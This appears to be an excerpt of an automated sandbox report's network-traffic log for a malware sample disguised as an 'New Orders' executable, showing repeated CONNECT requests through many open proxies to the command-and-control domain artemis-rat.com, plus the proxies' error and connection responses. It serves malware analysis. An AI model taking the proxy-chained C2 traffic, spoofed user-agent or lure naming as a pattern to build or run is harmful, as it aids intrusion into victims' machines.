                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1017192.168.2.952849175.183.82.22181937672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.636276007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.476984024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1018192.168.2.952932216.10.242.18306707672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.636454105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.491317034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.728342056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.148597002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.737904072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1019192.168.2.95300172.210.221.22341457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.639936924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1020192.168.2.95300672.206.181.105649357672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.643013954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1021192.168.2.950379220.194.189.14431287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.643487930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:14.148483992 CET719INHTTP/1.1 502 Bad Gateway
                                                                                        Server: ZZY_WEB/20.08.18
                                                                                        Date: Mon, 11 Mar 2024 15:39:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 563
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 5a 5a 59 5f 57 45 42 2f 32 30 2e 30 38 2e 31 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>ZZY_WEB/20.08.18</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1022192.168.2.952168162.241.79.22353187672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.643697023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.687726021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.836077929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1023192.168.2.95308134.30.26.17731287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.644186974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.259804964 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1024192.168.2.95302572.210.252.13741457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.649183035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1025192.168.2.952994121.182.138.71807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.654337883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.949903011 CET340INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.12.2
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 173
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1026192.168.2.952158148.72.23.56361117672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.654616117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.687777042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.836080074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.933494091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:07.945310116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:31.945031881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:19.960679054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1027192.168.2.95306492.204.135.37269277672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.654947996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1028192.168.2.952204189.240.60.17190907672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.667443037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.940895081 CET72INHTTP/1.1 200 Connection established
                                                                                        Proxy-Agent: Fortinet-Proxy/1.0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1029192.168.2.953005125.141.139.6055667672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.668458939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:02.955538034 CET755INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 6f 72 20 69 73 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 6f 72 20 69 73 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 54 6f 72 20 61 73 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 6f 72 20 69 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 21 2d 2d 20 50 6c 75 73 20 74 68 69 73 20 63 6f 6d 6d 65 6e 74 2c 20 74 6f 20 6d 61 6b 65 20 74 68 65 20 62 6f 64 79 20 72 65 73 70 6f 6e 73 65 20 6d 6f 72 65 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 73 6f 20 20 20 20 20 20 49 45 20 77 69 6c 6c 20 62 65 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 70 6c 61 79 20 69 74 2e 20 43 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 20 20 20 20 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 2e 2d 2d 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                        Data Ascii: <html><head><title>Tor is not an HTTP Proxy</title></head><body><h1>Tor is not an HTTP Proxy</h1><p>It appears you have configured your web browser to use Tor as an HTTP proxy.This is not correct: Tor is a SOCKS proxy, not an HTTP proxy.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.... Plus this comment, to make the body response more than 512 bytes, so IE will be willing to display it. Comment comment comment comment comment comment comment comment comment comment comment comment.--></p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1030192.168.2.95305472.195.34.4241457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.668787956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1031192.168.2.950498107.155.65.1131287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.685498953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.773098946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.034454107 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1032192.168.2.95313740.76.160.14390007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.687098980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1033192.168.2.95307698.170.57.24941457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.696346998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1034192.168.2.95304975.119.145.169380237672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.777324915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.491458893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.436861038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.336038113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.095566034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.945293903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.633030891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:06.001943111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:20.741904974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1035192.168.2.95303994.130.94.45807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.778160095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.086446047 CET303INHTTP/1.1 400 Bad Request
                                                                                        Server: openresty
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 154
                                                                                        Connection: close
